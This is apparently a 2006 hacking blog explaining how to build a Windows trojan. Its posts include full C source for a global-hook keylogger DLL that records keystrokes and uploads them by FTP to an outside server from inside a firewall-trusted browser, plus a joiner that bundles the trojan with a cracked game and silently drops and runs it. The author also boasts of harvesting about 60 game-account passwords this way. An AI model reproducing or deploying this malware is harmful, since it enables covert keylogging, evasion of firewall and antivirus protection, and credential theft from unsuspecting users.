Beng Hacks: January 2006

Thursday, January 12, 2006

Is it really that easy to bypass firewall and antivirus?

Someone emailed me asking this very question. The short answer is NO, unless you're good at programming and know MS VC++. Of course that's assuming you're writing a trojan for Windows.

The longer answer is YES, though. It is actually a simple affair to bypass AV: just write unique code, don't rip off stuff you download from the net. Once you can do that, you bypass AV, since AV detects mainly by known signatures, not by behaviour. (Heuristic scanners do exist, but a fresh, unremarkable program rarely trips them.) The catch is that this only lasts until the first sample lands with an AV vendor and a signature gets written for it.

How about the firewall? Ok, software-based firewalls, eg ZoneAlarm and Sygate Personal Firewall, allow or block traffic based on known applications, eg iexplore.exe or firefox.exe. The cruel fact is you can write a program to hijack running apps to do the work for you. This is known as DLL injection. The easy route is a combination of a few things: SetWindowsHookEx, (optionally) LoadLibrary and Windows messages. You install a system-wide hook (thread id 0) whose hook procedure lives in your DLL, and Windows itself maps that DLL into every process that receives the hooked event; your trojan never has to open the other process. (The other route, CreateRemoteThread plus LoadLibrary, does open the target process directly.) Either way you get running apps to load a DLL of your choosing.

Using Windows messages is particularly good. Hooks let you intercept standard events like alt-tab/window focus changes (WH_CBT or WH_SHELL), keypresses (WH_KEYBOARD) and mouse clicks (WH_MOUSE). Anyway, in the firewall-bypass example, you write a DLL with functions to log keypresses and upload the log to an FTP server. Then you set a hook so that every app the user runs loads your DLL. Eg he runs notepad, it loads your DLL and logs keypresses. This is allowed because Windows allows programs to load DLLs; that's how Windows functions!

When the hook fires inside Internet Explorer (aka iexplore.exe), Windows loads your DLL into it as normal. But your DLL checks which process it has landed in (GetModuleFileName on the host EXE in DllMain), and this time, since it's iexplore.exe, it runs an extra function: FTP your logs to your FTP server. Since Internet Explorer is most likely already approved by your SPF or ZA as an ok-to-access-net app, the upload succeeds without user intervention or the firewall blocking it! The caveat: this beats a firewall that decides per executable only. A personal firewall that also checks the components (DLLs) loaded into a trusted program, like ZoneAlarm Pro's Component Control, will prompt about an unknown DLL inside iexplore.exe. And the same hook puts your DLL in the module list of every GUI process on the box, which is easy to spot.

If you need source to explain more, just email me.
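Here is the whole hook-DLL trick above in code, as an added example (mine, not the post's source). It is one C file: built as a DLL it exports the WH_KEYBOARD hook procedure and, in DllMain, checks whether the process it was just loaded into is a firewall-trusted browser; built with -DINSTALLER it is the small EXE that sets the global hook and keeps it alive. The DLL name, the log path, the FTP server, user and password, and the trusted-program list are all assumptions. The Win32 parts sit under #ifdef _WIN32 so the host-matching helper compiles and can be tested anywhere.

```c
/* hookdll.c: added example, not the post's code. Build on Windows (MSVC):
 *   cl /LD hookdll.c user32.lib wininet.lib   -> hookdll.dll (the hook DLL)
 *   cl /DINSTALLER hookdll.c user32.lib       -> installer that sets the global hook
 * Assumed: DLL name, log path, FTP server/credentials, trusted-program list. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Programs the personal firewall is assumed to have already approved for network access. */
static const char *TRUSTED_HOSTS[] = { "iexplore.exe", "firefox.exe" };

/* File name part of a Windows or POSIX path. */
static const char *path_basename(const char *path) {
    const char *sep = strrchr(path, '\\'), *fs = strrchr(path, '/');
    if (fs && (!sep || fs > sep)) sep = fs;
    return sep ? sep + 1 : path;
}

static int ieq(const char *a, const char *b) {   /* case-insensitive equality */
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* 1 if the process whose image is at exe_path is one of the firewall-trusted programs. */
int is_trusted_host(const char *exe_path) {
    const char *name = path_basename(exe_path);
    size_t i;
    for (i = 0; i < sizeof TRUSTED_HOSTS / sizeof *TRUSTED_HOSTS; i++)
        if (ieq(name, TRUSTED_HOSTS[i])) return 1;
    return 0;
}

#ifdef _WIN32
#include <windows.h>
#include <wininet.h>

#define LOG_PATH   "C:\\WINDOWS\\Temp\\k.log"   /* assumed */
#define FTP_SERVER "ftp.example.net"             /* assumed */
#define FTP_USER   "drop"                        /* assumed */
#define FTP_PASS   "drop"                        /* assumed */

static int g_trusted;    /* set once per process in DllMain: are we inside iexplore/firefox? */
static int g_uploaded;

/* Plain WinINet FTP upload. Run from inside iexplore.exe this is "the browser" talking. */
static void upload_log(void) {
    HINTERNET net = InternetOpenA("Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    HINTERNET ftp = net ? InternetConnectA(net, FTP_SERVER, INTERNET_DEFAULT_FTP_PORT, FTP_USER,
                                           FTP_PASS, INTERNET_SERVICE_FTP, 0, 0) : NULL;
    if (ftp) {
        FtpPutFileA(ftp, LOG_PATH, "k.log", FTP_TRANSFER_TYPE_BINARY, 0);
        InternetCloseHandle(ftp);
    }
    if (net) InternetCloseHandle(net);
}

/* WH_KEYBOARD hook procedure. Windows calls it inside whichever process got the keystroke,
 * which is exactly why this DLL ends up mapped into notepad, iexplore, everything. */
__declspec(dllexport) LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode == HC_ACTION && !(lParam & 0x80000000UL)) {   /* bit 31 clear: key down */
        FILE *f = fopen(LOG_PATH, "ab");
        if (f) {                                              /* wParam = virtual-key code */
            if (wParam >= '0' && wParam <= 'Z') fputc((int)wParam, f);
            else fprintf(f, "[%02X]", (unsigned)wParam);
            fclose(f);
        }
        /* Upload here, not in DllMain: network calls under the loader lock can deadlock. */
        if (g_trusted && !g_uploaded) { g_uploaded = 1; upload_log(); }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved) {
    char host[MAX_PATH];
    if (reason == DLL_PROCESS_ATTACH)   /* NULL module = the EXE we were just loaded into */
        g_trusted = GetModuleFileNameA(NULL, host, sizeof host) && is_trusted_host(host);
    return TRUE;
}

#ifdef INSTALLER
/* The "trojan" itself: install a global (thread id 0) hook and stay alive to keep it. */
int main(void) {
    MSG msg;
    HMODULE dll = LoadLibraryA("hookdll.dll");
    HOOKPROC proc = dll ? (HOOKPROC)GetProcAddress(dll, "KeyboardProc") : NULL;
    HHOOK hook = proc ? SetWindowsHookEx(WH_KEYBOARD, proc, dll, 0) : NULL;
    if (!hook) return 1;
    while (GetMessage(&msg, NULL, 0, 0) > 0) DispatchMessage(&msg);
    UnhookWindowsHookEx(hook);
    return 0;
}
#endif
#endif /* _WIN32 */
```

Two things to notice when you try it: the log starts filling the moment any window gets a keystroke, because the hook drags the DLL into every GUI process (which is also what makes it loud to a defender who lists loaded modules per process), and the upload is deliberately done from the hook callback rather than DllMain, since WinINet under the loader lock is a deadlock waiting to happen.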

But wait, how to infect the person? Simple, you need another app, called a joiner. You can write your own (best) or download some, but those are likely detected by AV. To write a joiner you need to understand how to pull a file back out of your own EXE. There is no Win32 call named CreateFileFromResource; the resource-based way is to store the payloads as custom resources in the stub EXE, then at run time find them with FindResource/LoadResource/LockResource/SizeofResource, write them out with CreateFile/WriteFile and launch them with CreateProcess. Once you've got that, it's a simple affair to package your own trojan together with a nice payload like a game crack. Keep in mind the joined trojan still lands on disk as a file before it runs, so the joiner hides nothing from AV that the trojan's own code doesn't already hide.
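An added example of the joiner side (mine, not the post's code). It uses the other common joiner layout instead of the resource APIs named above: the game crack and the trojan are appended to a stub EXE behind a small trailer; the joiner tool writes that layout (read the three files, pack_mem, write the result), and the stub reads its own image, splits it and runs both parts. The pack/unpack logic is plain C with constructed sample bytes standing in for the real files; the trailer format, the magic value and the self-path handling are my assumptions.

```c
/* joiner.c: added example (mine, not the post's). Layout: stub | game | trojan | trailer. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define JOIN_MAGIC 0x4A4F494Eu   /* "JOIN"; assumed marker */
#define MAX_PARTS  2

struct trailer {                 /* written raw: same machine type on both ends */
    uint32_t sizes[MAX_PARTS];   /* byte length of each appended part, in order */
    uint32_t count;
    uint32_t magic;
};

/* Joiner side: write stub, parts and trailer into out; returns bytes written (0 on bad n). */
size_t pack_mem(uint8_t *out, const uint8_t *stub, size_t stub_len,
                const uint8_t *const parts[], const size_t lens[], int n) {
    struct trailer t = {{0}, 0, 0};
    size_t off = stub_len;
    int i;
    if (n < 1 || n > MAX_PARTS) return 0;
    memcpy(out, stub, stub_len);
    for (i = 0; i < n; i++) {
        memcpy(out + off, parts[i], lens[i]);
        off += lens[i];
        t.sizes[i] = (uint32_t)lens[i];
    }
    t.count = (uint32_t)n;
    t.magic = JOIN_MAGIC;
    memcpy(out + off, &t, sizeof t);
    return off + sizeof t;
}

/* Stub side: locate the parts inside a packed image. Returns count, or 0 when there is no
 * valid trailer (a bare stub) or the sizes don't fit the image (truncated/forged download). */
int unpack_mem(const uint8_t *image, size_t image_len,
               const uint8_t *parts[], size_t lens[]) {
    struct trailer t;
    size_t total = 0, off;
    int i;
    if (image_len < sizeof t) return 0;
    memcpy(&t, image + image_len - sizeof t, sizeof t);
    if (t.magic != JOIN_MAGIC || t.count < 1 || t.count > MAX_PARTS) return 0;
    for (i = 0; i < (int)t.count; i++) total += t.sizes[i];
    if (total > image_len - sizeof t) return 0;
    off = image_len - sizeof t - total;
    for (i = 0; i < (int)t.count; i++) {
        parts[i] = image + off;
        lens[i] = t.sizes[i];
        off += t.sizes[i];
    }
    return (int)t.count;
}

static uint8_t *read_file(const char *path, size_t *len) {
    FILE *f = fopen(path, "rb");
    uint8_t *buf = NULL;
    long n;
    if (!f) return NULL;
    if (fseek(f, 0, SEEK_END) == 0 && (n = ftell(f)) >= 0 && (buf = malloc((size_t)n + 1)) != NULL) {
        rewind(f);
        if (fread(buf, 1, (size_t)n, f) == (size_t)n) *len = (size_t)n; else { free(buf); buf = NULL; }
    }
    fclose(f);
    return buf;
}

static int write_file(const char *path, const uint8_t *data, size_t len) {
    FILE *f = fopen(path, "wb");
    int ok = f != NULL && fwrite(data, 1, len, f) == len;
    if (f) fclose(f);
    return ok;
}

/* Stub entry: split our own image, drop both parts under the given names and run them.
 * On Windows, self must come from GetModuleFileNameA(NULL, ...); argv[0] is not reliable there. */
int drop_and_run(const char *self, const char *const names[MAX_PARTS]) {
    const uint8_t *parts[MAX_PARTS];
    size_t img_len, lens[MAX_PARTS];
    uint8_t *img = read_file(self, &img_len);
    int n = img ? unpack_mem(img, img_len, parts, lens) : 0, i;
    for (i = 0; i < n; i++)   /* game first, so the victim sees what they expected */
        if (write_file(names[i], parts[i], lens[i]) && system(names[i]) == -1) break;
    free(img);
    return n;
}

/* Round trip on constructed sample bytes standing in for the real files. Returns 1 on success. */
int joiner_selftest(void) {
    static const uint8_t stub[] = "MZ..stub", game[] = "war3-cracked", trojan[] = "keylogger";
    const uint8_t *parts[MAX_PARTS] = { game, trojan }, *out[MAX_PARTS];
    size_t lens[MAX_PARTS] = { sizeof game - 1, sizeof trojan - 1 }, out_lens[MAX_PARTS], n;
    uint8_t buf[128];
    n = pack_mem(buf, stub, sizeof stub - 1, parts, lens, 2);
    if (n != sizeof stub - 1 + lens[0] + lens[1] + sizeof(struct trailer)) return 0;
    if (unpack_mem(buf, n, out, out_lens) != 2) return 0;
    if (out_lens[0] != lens[0] || memcmp(out[0], game, lens[0]) != 0) return 0;
    if (out_lens[1] != lens[1] || memcmp(out[1], trojan, lens[1]) != 0) return 0;
    return unpack_mem(stub, sizeof stub - 1, out, out_lens) == 0;   /* bare stub: no trailer */
}
```

Note the length check on the trailer: a stub that trusts whatever sizes the trailer says would read out of bounds on a truncated download. And the dropped files are ordinary files on disk, so an on-access scanner sees the trojan the instant write_file finishes; the joiner buys nothing against AV on its own, which is why the post keeps coming back to writing your own code.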

Thursday, January 05, 2006

Trojan hacker for hire!

$300 per trojan, fully undetectable, fully stealthy, per your pleasure. Email arrestmenow@fbi.com! LOL...

Yeah well, this past holiday break I've been exploring trojans with my group. Seems the world of firewalls and antivirus is for the 99% of fools out there. The other 1%, the smart people, live. And in this 1%, everything is possible, even with so-called protection installed, be it firewall, antivirus or security patches.

Yes, it's entirely possible (and EASY!) to write your own trojan that keylogs, captures mouse presses, takes screenshots of your desktop, etc., and then sends all this info back to me without the victim knowing what happened. And all this under the nose of the latest firewall and antivirus.

Why? Let me break it down into the two.


Firewall:
Personal firewalls block by application. Stronger firewalls (like the network ones in front of servers) block by address and port, and can't tell which process on your PC sent the packet. What if your transmission goes out on an approved port (eg 80) AND from an approved app (eg Internet Explorer)? Then the traffic is legal. But surprise! I can hijack both these things (see the DLL hook trick in the post above), and my trojan traffic is now legal.


Antivirus:
This one is even easier. AV works by detecting known byte signatures of viruses. What if you wrote your own virus? Of course then it's not picked up by the AV, at least until someone sends a sample to the vendor. After all, I don't think there's a BengHacks.W32 out there...

So how to spread my trojan to steal passwords and bank account numbers? VERY EASY. How about I crack the Warcraft 3 exe (very popular now with DOTA) and put it on a website for free download? A lot of people will download it. In a few days I had collected about 60 BNet accounts and passwords, not to mention VERY interesting info heheheh.

But of course I'm not stupid enough to go commit a crime. But it proved my point.